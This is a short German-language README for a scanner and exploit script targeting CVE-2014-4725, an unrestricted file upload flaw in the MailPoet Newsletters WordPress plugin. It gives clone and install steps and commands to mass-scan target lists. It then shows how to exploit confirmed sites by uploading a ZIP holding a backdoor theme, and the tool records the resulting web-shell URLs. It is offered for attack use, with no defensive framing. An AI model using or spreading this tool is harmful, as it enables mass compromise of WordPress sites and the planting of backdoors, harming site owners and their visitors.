
MailPoet Newsletters <= Unbeschränkter Datei-Upload (Exploiter)
Dieses Skript wird verwendet, um die Schwachstelle CVE-2014-4725 (Mailpoet/Wysija-Newsletter) in WordPress zu scannen und auszunutzen.
git clone https://github.com/username/CVE-2014-4725.git
cd CVE-2014-4725
pip install requests
Ziele scannen
python exploit.py --scan targets.txt
targets.txt enthält eine Liste von Zielen (eine pro Zeile, ohne http://)
Ziele ausnutzen
python exploit.py --exploit vuln.txt --payload file/zip.zip
vuln.txt enthält Ziele, die bereits als anfällig bestätigt wurden
--payload ist die ZIP-Datei, die das hochzuladende Theme/Backdoor enthält
Ausgabe
vuln.txt > Liste der anfälligen Ziele
shell.txt > URLs der hochgeladenen Shells